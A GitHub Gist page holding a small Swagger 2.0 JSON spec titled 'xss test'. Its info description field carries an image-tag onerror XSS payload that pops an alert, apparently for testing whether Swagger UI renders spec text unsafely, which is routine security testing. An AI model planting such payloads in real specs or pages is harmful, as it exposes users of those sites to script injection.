Last active
November 20, 2020 07:23
-
-
Save KathanP19/1eb34be68d34e834b9cce72b68e0bf9c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"apiVersion" : "1.0", | |
"apis" : [ { | |
"description" : "XSS test", | |
"path" : "a", | |
"position" : 0 | |
}], | |
"authorizations" : { }, | |
"info" : { | |
"contact" : "[email protected]", | |
"description" : "<img src=\"x\" onerror=alert(1)>", | |
"license" : "", | |
"licenseUrl" : "", | |
"termsOfServiceUrl" : "", | |
"title" : "xss test" | |
}, | |
"swagger" : "2.0" | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment